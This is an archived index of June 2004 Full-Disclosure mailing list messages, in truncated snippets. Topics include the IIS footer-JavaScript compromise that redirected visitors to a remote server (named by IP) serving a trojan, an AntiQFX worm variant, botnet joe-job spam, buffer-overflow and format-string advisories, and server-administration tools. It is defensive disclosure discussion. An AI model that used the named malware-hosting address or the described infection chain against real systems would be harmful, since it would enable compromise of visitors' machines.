SV: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread Peter Kruse
Hi Nick, It does this via the now very old ms-its: protocol zone-handling bug... Apparently someone needs to decode a few more levels of JavaScript, etc to work this all out... I don't think so. This looks a lot like the unpatched IE bug that was also exploited by the Ilookup trojan. See

[Full-Disclosure] Call For Papers : HITB Security Conference 2004

2004-06-25 Thread Alphademon
Hack In The Box Security Conference 2004 : Kuala Lumpur, Malaysia - Greetings, We are inviting individuals or groups who are interested in computer security, challenges and practices especially the latest technological innovations

Re: [Full-Disclosure] defamatory joe job attack by botnet

2004-06-25 Thread Jean-Marie Monnier
I have experienced - and this annoyance still goes on - something similar to the stealing of identity reported by Stuart (except that there is so far no hate mail involved, but good old spamming to sell junk or offer access to porn sites, which I discovered by getting undelivered mail sent

Re: SV: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread Duncan Hill
On Friday 25 June 2004 07:05, Peter Kruse might have typed: When the javascript runs it will try to redirect you to a remote server http://217.107.218.147. This is where the MSITS.EXE and the javascripts are stored. As far as I know they do not reside on the compromised IIS servers, but

Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

2004-06-25 Thread Paolo A. Gallenga
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Grisoft's AVG 6.0.71 DAT 466 23/06/2004 also detects it as Win32/Antiqfx. Regards, Paolo X iniT wrote: | Hello all, | | | The attached file seems to be a variant of AntiQFX | worm. | | AntiQFX Worm masquerades as | an old dos utility MSCDEX.EXE.

Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

2004-06-25 Thread Duncan Hill
On Friday 25 June 2004 08:36, X iniT might have typed: AntiQFX Worm masquerades as an old dos utility MSCDEX.EXE. Basically spreads via shared networks and deletes a few files which belong to a couple of Photo Editing F-Secure Anti-Virus for Linux version 4.52 build 2461 Copyright (c)

Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread Gary Flynn
Just a reminder. This isn't the first time this has happened: http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675 -- Gary Flynn Security Engineer James Madison University ___ Full-Disclosure - We believe in it.

Re: [Full-Disclosure] defamatory joe job attack by botnet

2004-06-25 Thread Charles Richmond
On Jun 24, 2004, at 11:43 PM, lsi wrote: I can report that not only is this activity continuing, but it is doing so under the names of ... well, me, at least - I have received several bounces indicating that my email address is being used as the from address. The spammers are using addresses from

RE: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread joe
For the IIS side http://www.microsoft.com/security/incident/download_ject.mspx Microsoft teams are investigating a report of a security issue affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer, components of Windows. Important

Re: [Full-Disclosure] server administration

2004-06-25 Thread Mohit Muthanna
Harry, What you're talking about falls under the realm of Systems / Network Management. Generally when you have large numbers of servers / devices to manage you need an effective tool. You can write your own scripts, but you'd just be duplicating the efforts of a number of available tools out

Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread [EMAIL PROTECTED]
With the current (in)security of most (if not all) ISPs that provide ASP.NET or ASP Classic shared hosting services, all the attackers need to do is get a hosting account on a shared hosting server (trivial) and infect these websites from the inside. I haven't heard of any new IIS exploit

Re: [Full-Disclosure] server administration

2004-06-25 Thread Mohit Muthanna
Having said that, you're going to be disappointed in what snmp will provide unless you want to start writing MIBs (you don't). So you will be doing some sort of client/server model maybe with *NIX tools like vmstat and traceroute and wget. We did something similar in 1998 I recall. I

Re: [Full-Disclosure] defamatory joe job attack by botnet

2004-06-25 Thread Jean-Marie Monnier
I can only second Charles' and Isi's statements I sent a mail earlier this morning to the list, and it was bounced back to me by different engines. I made my case worse by underlining the fact that the body of the messages sent under my sp**fed identity were either advertising P*RN

Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread bills.bitch
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 This is impossible. Microsoft products are inherently secure. We have a patched IIS as stated by the alert, an alpha security patch for the operating system and open holes in the browser. No doubt this is a vicious anti-Microsoft attempt to discredit

Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

2004-06-25 Thread Nick FitzGerald
X iniT [EMAIL PROTECTED] wrote: snip Look closely and you'll see that i've attached this file using my yahoo account. Which happens to be protected by NAV !!! The following link clearly states that NAV detects this worm since 2002 !!!

Re: [Full-Disclosure] server administration

2004-06-25 Thread Mohit Muthanna
I have to throw cfengine into this mix, too. http://www.cfengine.com/ Of course... how could I forget cfengine. Another godsend. Also just remembered: syslog-ng is a good replacement for syslog. Thx, Mohit. -- Mohit Muthanna [mohit (at) muthanna (uhuh) com] There are 10 types of people.

Re: [Full-Disclosure] Evidence of a ISC being hacked?

2004-06-25 Thread Valdis . Kletnieks
On Thu, 24 Jun 2004 21:12:46 PDT, VX Dude [EMAIL PROTECTED] said: ...and the build broke on OTHER systems because there wasn't a vsnprintf() in the vendor libc - and your boss is telling you TO GET THE THING TO BUILD, NOW The programmer who is willing to swear on a Bible that they

Re: [Full-Disclosure] server administration

2004-06-25 Thread Darren Spruell
Mohit Muthanna wrote: I'd suggest you read up on SNMP. And check out the following tools (google them): - net-snmp ( an SNMP agent ) - nagios ( very sophisticated network management tool ) - nmap ( good discovery tool ) - ntop ( traffic analysis, RMON agent, performance monitoring ) - sar ( system

Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread insecure
Berbew/Webber/Padodor Trojan, according to Lurhq. http://www.lurhq.com/berbew.html joe wrote: For the IIS side http://www.microsoft.com/security/incident/download_ject.mspx Microsoft teams are investigating a report of a security issue affecting customers using Microsoft Internet Information

RE: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

2004-06-25 Thread Randal, Phil
Nick FitzGerald [EMAIL PROTECTED] wrote: That's odd -- I had the file scanned with 22 different virus scanners and only three (NAV, Panda and ClamAV) missed detecting it as AntiQFX or something very similar... New patterns for ClamAV have just been released (daily.cvd version 371) which

Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

2004-06-25 Thread Raymond Dijkxhoorn
Hi! Same thing with AVP, ClamAV and F-Prot. Only Sophos detects this file as an AntiQFX.F variant. That's odd -- I had the file scanned with 22 different virus scanners and only three (NAV, Panda and ClamAV) missed detecting it as AntiQFX or something very similar... Bitdefender detects it

Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

2004-06-25 Thread Eric Paynter
On Fri, June 25, 2004 8:58 am, Nick FitzGerald said: That's odd -- I had the file scanned with 22 different virus scanners and only three (NAV, Panda and ClamAV) missed detecting it as AntiQFX or something very similar... ClamAV is now detecting it as well. They must have updated their sigs

[Full-Disclosure] Multiple remote local buffer overflows discovered in Drcatd

2004-06-25 Thread Khan Shirani
Zone-h Security Advisory. Date of discovery: 24 June 2004. Date of release: 25 June 2004. Bug found by Khan Shirani [EMAIL PROTECTED] http://www.zone-h.org --- Software: Drcatd. Bugs: Buffer overflows, remote and local (multiple). Risk: low. Platform:

[Full-Disclosure] format string vulnerability in Gnats

2004-06-25 Thread Khan Shirani
Zone-h Security Advisory. Date of discovery: 21 June 2004. Date of release: 24 June 2004. http://www.zone-h.org Bug found by Khan Shirani [EMAIL PROTECTED] --- Software: GNU Gnats 4.00. Bugs: format string bug(s). Risk: low/medium. Platform:

[Full-Disclosure] Fwd: Alert: IIS compromised to place footer JavaScript on each page

2004-06-25 Thread B3r3n
FYI There have been several reports of IIS servers being compromised in a similar fashion. The result is that each has a document footer specified which is JavaScript which causes the viewing browser to load a page from a malicious website. The loaded page installs a trojan via one of several

[Full-Disclosure] Microsoft and Security

2004-06-25 Thread [EMAIL PROTECTED]
Where is Microsoft now protecting their customers as they love to bray? Should not someone in authority of this public company step forward and explain themselves at this time? All of sudden panic is being created across the WWW with IIS Exploit Infecting Web Site Visitors With Malware,

[Full-Disclosure] Microsoft Identity Integration Server

2004-06-25 Thread Michael Schaefer
We are thinking about trying out this technology. Has anyone used this? Are there any known security risks? M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] server administration

2004-06-25 Thread Black, Braden
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of harry Sent: Monday, June 21, 2004 6:59 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] server administration hi all, i know this is not really a security thing, so if someone could tell

Re: [Full-Disclosure] Microsoft and Security

2004-06-25 Thread Brian Toovey
Anybody got a packet dump of the attack yet so we can regex out this vuln against IIS? It is quite terrible that this IE vuln has gone on now for two weeks - from what I understand this is a product feature, and that's why they haven't addressed it. We filter our local redirects at our proxy
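The footer injection described in the "Alert: IIS compromised to place footer JavaScript on each page" post above, and the regex-style filtering asked about in the reply just above, as an added example that is not code from any of these posts: a Python check that flags script elements appended after `</html>` or pulling code from a host the site does not own. The trusted host list, the sample pages and the 198.51.100.7 address are constructed for the example and are not from the original reports.

```python
"""Check served HTML for a script block appended by a server-side footer.

Added example, not code from the list posts. TRUSTED_HOSTS, the sample pages
and the 198.51.100.7 address are constructed for illustration.
"""
import re
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads script from.
TRUSTED_HOSTS = frozenset({"www.example.com", "example.com"})

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s"'<>()]+""", re.IGNORECASE)
HTML_END_RE = re.compile(r"</html\s*>", re.IGNORECASE)


def _host(url):
    """Lowercased host part of a URL; '' for relative URLs."""
    return (urlparse(url).hostname or "").lower()


def find_injected_scripts(html, trusted_hosts=TRUSTED_HOSTS):
    """Return findings for script elements that look footer-injected: placed
    after </html>, loaded from an untrusted host, or containing a URL that
    points at an untrusted host (the hidden iframe / redirect pattern)."""
    findings = []
    end = HTML_END_RE.search(html)
    doc_end = end.end() if end else len(html)
    for m in SCRIPT_RE.finditer(html):
        attrs, body = m.group(1), m.group(2)
        reasons = []
        if m.start() >= doc_end:
            reasons.append("script after </html>")
        src = SRC_RE.search(attrs)
        if src and _host(src.group(1)) and _host(src.group(1)) not in trusted_hosts:
            reasons.append("external src " + src.group(1))
        for url in URL_RE.findall(body):
            if _host(url) not in trusted_hosts:
                reasons.append("untrusted URL in inline script " + url)
        if reasons:
            findings.append({"offset": m.start(), "reasons": reasons})
    return findings


def scan_pages(pages, trusted_hosts=TRUSTED_HOSTS):
    """pages maps path -> HTML body (captured at the proxy or read from the
    web root). Returns only the paths that have findings."""
    result = {}
    for path, html in pages.items():
        found = find_injected_scripts(html, trusted_hosts)
        if found:
            result[path] = found
    return result


# Constructed sample pages: a clean page, and the same page with a footer
# script appended after </html> that writes a hidden iframe to another host.
CLEAN_PAGE = (
    "<html><head><script src='/js/site.js'></script></head>"
    "<body><p>hello</p></body></html>\n"
)
INJECTED_PAGE = CLEAN_PAGE + (
    "<script>document.write('<iframe src=\"http://198.51.100.7/x.htm\" "
    "width=0 height=0></iframe>')</script>"
)
SAMPLE_PAGES = {"/index.htm": INJECTED_PAGE, "/about.htm": CLEAN_PAGE}

if __name__ == "__main__":
    for path, hits in scan_pages(SAMPLE_PAGES).items():
        for hit in hits:
            print(path, hit["offset"], "; ".join(hit["reasons"]))
```

The scan only looks at what the server actually sends, which is the right place to look when the compromise is a footer appended to every response rather than a change to the page files themselves; a hit on the served page is the cue to inspect the IIS document footer setting the alert mentions. Fed with pages captured at the proxy, the same function does the "regex out" job the reply asks for without needing the attack packet dump first.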

Re: [Full-Disclosure] Microsoft Identity Integration Server

2004-06-25 Thread Eric Paynter
On Fri, June 25, 2004 12:35 pm, Michael Schaefer said: Are there any known security risks? It's made by Microsoft. Isn't that a significant security risk? -Eric ___ Full-Disclosure - We believe in it. Charter:

[Full-Disclosure] [SECURITY] [DSA 525-1] New apache packages fix buffer overflow in mod_proxy

2004-06-25 Thread debian-security-announce
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 -- Debian Security Advisory DSA 525-1 [EMAIL PROTECTED] http://www.debian.org/security/ Matt Zimmerman June 24th, 2004

[Full-Disclosure] [ GLSA 200406-20 ] FreeS/WAN, Openswan, strongSwan: Vulnerabilities in certificate handling

2004-06-25 Thread Thierry Carrez
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Gentoo Linux Security Advisory GLSA 200406-20

Re: [Full-Disclosure] Microsoft Identity Integration Server

2004-06-25 Thread Valdis . Kletnieks
On Fri, 25 Jun 2004 15:35:51 EDT, Michael Schaefer [EMAIL PROTECTED] said: Has anyone used this? Are there any known security risks? (None of this is specific to the product, but all of it is stuff that we as an industry keep re-botching over and over, so I'll mention it here anyhow...) Three

RE: [Full-Disclosure] Microsoft and Security

2004-06-25 Thread Burnes, James
One word, m-o-n-o-p-o-l-y And what are you going to do about it, punk? -Original Message- From: [EMAIL PROTECTED] [mailto:full-disclosure- [EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Friday, June 25, 2004 10:02 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL

[Full-Disclosure] New Auditor security collection announcement

2004-06-25 Thread mmo
Hi there, just like to announce, that the new version of the Auditor security collection (auditor-220604-01B) is available now at http://www.moser-informatik.ch/?page=productslang=eng Thanx for your feedback. Greetings Max Changes in this version: Keyboard mapping is

[Full-Disclosure] RE: Microsoft and Security

2004-06-25 Thread Drew Copley
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Friday, June 25, 2004 11:53 AM To: [EMAIL PROTECTED] Subject: Microsoft and Security snip A vulnerability: http://www.microsoft.com/technet/archive/community/columns/security/essays/vulnrbl.mspx A

RE: [Full-Disclosure] Microsoft and Security

2004-06-25 Thread [EMAIL PROTECTED]
volunteer as an expert witness when the negligence lawsuits finally arise :) and you? Burnes, James [EMAIL PROTECTED] said: One word, m-o-n-o-p-o-l-y And what are you going to do about it, punk? -Original Message- From: [EMAIL PROTECTED] [mailto:full- disclosure-

[Full-Disclosure] Disassembled Source for latest Backdoor-axj?

2004-06-25 Thread Burnes, James
Does anyone have a good disassembled source listing for the latest backdoor-axj? Of course if you have the original commented source, I'll take that also. ;-) thx ___ Full-Disclosure - We believe in it. Charter:

Re: SV: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread Nasir Ghaznavi
As of now the server, which was a russian server has been taken down. Nasir Ghaznavi On Fri, 25 Jun 2004 10:36:08 +0100, Duncan Hill [EMAIL PROTECTED] wrote: On Friday 25 June 2004 07:05, Peter Kruse might have typed: When the javascript runs it will try to redirect you to a remote server

Re: [Full-Disclosure] flaw in php_exec_dir patch

2004-06-25 Thread VeNoMouS
Dude, do you even know what the php_exec_dir patch is? It's a patch so you don't have to turn safe mode on, which disables a bunch of shit that you need, so the patch was a workaround to simply stop you executing programs. Here's a hint: learn about the product before you spam a mailing list. I see 5 posts